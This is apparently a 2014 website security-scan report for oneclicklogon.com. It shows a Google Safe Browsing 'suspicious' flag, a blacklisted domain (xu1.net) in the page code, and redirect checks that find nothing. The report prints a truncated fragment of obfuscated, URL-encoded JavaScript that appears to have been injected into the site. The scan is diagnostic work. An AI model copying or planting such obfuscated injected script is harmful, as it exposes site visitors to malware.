Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oneclicklogon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://oneclicklogon.com/ | 200 OK Content-Length: 1452 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: xu1.net ...[1148 bytes skipped]... 6e%30%68%7d%47%43%35%7c%60%72%6b%72%79%4422403184%34%32%31%34%38%35%35' + unescape('%27%29%29%3b')); // --> </script> <noscript><i>Javascript required</i></noscript> </html> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD> <BODY>xu1.net</BODY></HTML> | ||
http://oneclicklogon.com/test404page.js | 404 Not Found Content-Length: 613 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oneclicklogon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 02:26:21 GMT
Accept-Ranges: bytes
Server: nginx/1.6.1
Content-Length: 1452
Content-Type: text/html
Last-Modified: Fri, 25 Apr 2014 23:00:46 GMT
...1452 bytes of data.
GET / HTTP/1.1
Host: oneclicklogon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 02:26:21 GMT
Accept-Ranges: bytes
Server: nginx/1.6.1
Content-Length: 1452
Content-Type: text/html
Last-Modified: Fri, 25 Apr 2014 23:00:46 GMT
...1452 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: oneclicklogon.com
Referer: http://www.google.com/search?q=oneclicklogon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oneclicklogon.com
Referer: http://www.google.com/search?q=oneclicklogon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.